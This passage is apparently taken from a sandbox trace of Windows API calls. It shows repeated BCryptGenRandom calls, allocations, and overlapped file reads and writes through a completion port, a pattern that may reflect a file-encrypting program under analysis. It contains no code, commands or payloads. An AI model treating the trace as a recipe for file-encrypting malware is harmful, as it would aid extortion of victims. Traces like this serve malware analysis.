(lpLibFileName="bcrypt.dll") returned 0x753f0000 [0126.277] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0126.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0126.278] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0126.278] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0126.278] free (_Block=0x3e305b8) [0126.278] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0126.278] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0126.278] free (_Block=0x1fa91d0) [0126.278] free (_Block=0x77d7a8) [0126.278] free (_Block=0x1fa90b8) [0126.278] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0126.279] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0127.126] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0127.127] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0127.128] CloseHandle (hObject=0x308) returned 1 [0127.128] free (_Block=0x3df0008) [0127.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0128.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0128.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0128.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0128.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0128.659] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0128.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0128.659] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0128.659] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0128.660] free (_Block=0x3e305b8) [0128.660] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0128.660] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0128.660] free (_Block=0x1fa91d0) [0128.660] free (_Block=0x77d7a8) [0128.660] free (_Block=0x1fa90b8) [0128.660] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0128.660] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0128.671] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0128.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0128.672] CloseHandle (hObject=0x308) returned 1 [0128.672] free (_Block=0x3df0008) [0128.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0129.653] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0129.653] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0129.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0129.653] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0129.654] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0129.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0129.654] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0129.654] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0129.654] free (_Block=0x3e305b8) [0129.654] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0129.654] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0129.655] free (_Block=0x1fa91d0) [0129.655] free (_Block=0x77d7a8) [0129.655] free (_Block=0x1fa90b8) [0129.655] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0129.655] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0129.696] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0129.696] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0129.697] CloseHandle (hObject=0x308) returned 1 [0129.697] free (_Block=0x3df0008) [0129.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0130.778] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0130.779] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0130.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0130.779] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0130.779] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0130.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0130.780] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0130.780] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0130.780] free (_Block=0x3e305b8) [0130.780] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0130.780] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0130.780] free (_Block=0x1fa91d0) [0130.780] free (_Block=0x77d7a8) [0130.780] free (_Block=0x1fa90b8) [0130.780] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0130.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0132.206] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0132.207] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0132.208] CloseHandle (hObject=0x308) returned 1 [0132.209] free (_Block=0x3df0008) [0132.209] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0134.487] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0134.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0134.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0134.488] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0134.489] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0134.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0134.489] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0134.489] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0134.489] free (_Block=0x3e305b8) [0134.489] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0134.489] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0134.490] free (_Block=0x1fa91d0) [0134.490] free (_Block=0x77d7a8) [0134.490] free (_Block=0x1fa90b8) [0134.490] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0134.490] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0135.661] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0135.755] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0135.894] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0135.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0136.003] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0136.060] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0136.158] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7db8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0137.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.064] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7f68, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.182] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3ee8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.183] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.183] CloseHandle (hObject=0x308) returned 1 [0138.183] free (_Block=0x3df0008) [0138.183] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.306] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.307] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.307] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.307] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.307] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.307] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.308] free (_Block=0x3e305b8) [0138.308] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.308] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.308] free (_Block=0x1fa91d0) [0138.308] free (_Block=0x77d7a8) [0138.308] free (_Block=0x1fa90b8) [0138.308] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.308] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.309] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3e80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.309] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.333] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6978, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.343] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.356] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x4290, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0138.366] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.372] ReadFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x3264, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.384] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.441] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0138.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.456] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.456] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.456] free (_Block=0x3e305b8) [0138.456] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.456] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.456] free (_Block=0x1fa91d0) [0138.456] free (_Block=0x77d7a8) [0138.456] free (_Block=0x1fa90b8) [0138.457] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0138.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.457] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.458] CloseHandle (hObject=0x3cc) returned 1 [0138.458] free (_Block=0x3d70450) [0138.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.477] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.478] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0138.478] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.478] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0138.479] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0138.479] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0138.479] free (_Block=0x3e305b8) [0138.479] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0138.479] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0138.480] free (_Block=0x1fa91d0) [0138.480] free (_Block=0x77d7a8) [0138.480] free (_Block=0x1fa90b8) [0138.480] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0138.480] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.481] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x4320, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0138.482] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.511] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2d0c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0138.533] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.541] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x4b80, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.552] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.565] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1214, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0138.578] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.588] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x4540, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0138.593] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0138.604] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.605] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.605] BCryptGenRandom (in: 